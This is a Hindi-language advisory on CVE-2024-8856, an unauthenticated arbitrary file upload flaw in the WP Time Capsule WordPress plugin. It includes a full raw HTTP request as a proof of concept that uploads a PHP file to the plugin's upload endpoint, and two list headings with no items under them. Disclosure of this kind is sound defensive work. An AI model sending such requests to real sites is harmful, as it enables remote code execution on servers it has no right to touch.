
वर्डप्रेस WP टाइम कैप्सूल प्लगइन मनमाना फ़ाइल अपलोड कमजोरी
CVE-2024-8856 एक सुरक्षा भेद्यता है जो वर्डप्रेस के लिए WP Time Capsule प्लगइन में पाई गई है जो अप्रमाणित उपयोगकर्ताओं को सर्वर पर मनमानी फ़ाइलें अपलोड करने की अनुमति देती है। यदि अपलोड की गई फ़ाइलों को सर्वर द्वारा निष्पादित किया जाता है, तो इससे दूरस्थ कोड निष्पादन हो सकता है। यह भेद्यता अपर्याप्त फ़ाइल सत्यापन से उत्पन्न होती है और संवेदनशील एंडपॉइंट पर विशेष रूप से तैयार किए गए अनुरोध भेजकर इसका शोषण किया जा सकता है।
यह भेद्यता एक अप्रमाणित उपयोगकर्ताओं को अनुमति देती है:
निम्नलिखित एक प्रमाण की अवधारणा है जो दर्शाती है कि संवेदनशील एंडपॉइंट पर POST अनुरोध भेजकर CVE-2024-8856 भेद्यता का शोषण कैसे किया जाए।
POST /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php HTTP/1.1
Host: wordpress.local
Content-Length: 199
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHvQu3NOpI44bLkPN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://wordpress.local
Content-Disposition: 18.php
Accept-Encoding: gzip, deflate, br
Connection: close
------WebKitFormBoundaryHvQu3NOpI44bLkPN
Content-Disposition: form-data; name="files"; filename="php"
Content-Type: application/sql
<?php phpinfo();
------WebKitFormBoundaryHvQu3NOpI44bLkPN--
इस भेद्यता को कम करने के लिए:
CVE-2024-8856 - राष्ट्रीय भेद्यता डेटाबेस
CVE-2024-8856 एक गंभीर भेद्यता है जिस पर WP Time Capsule प्लगइन का उपयोग करने वाले WordPress साइटों के प्रशासकों का तत्काल ध्यान आवश्यक है। संभावित शोषण के खिलाफ एप्लिकेशन को सुरक्षित करने के लिए उचित सावधानी बरती जानी चाहिए। हमेशा सुरक्षा प्रथाओं और प्लगइन अपडेट के साथ अपडेट रहें।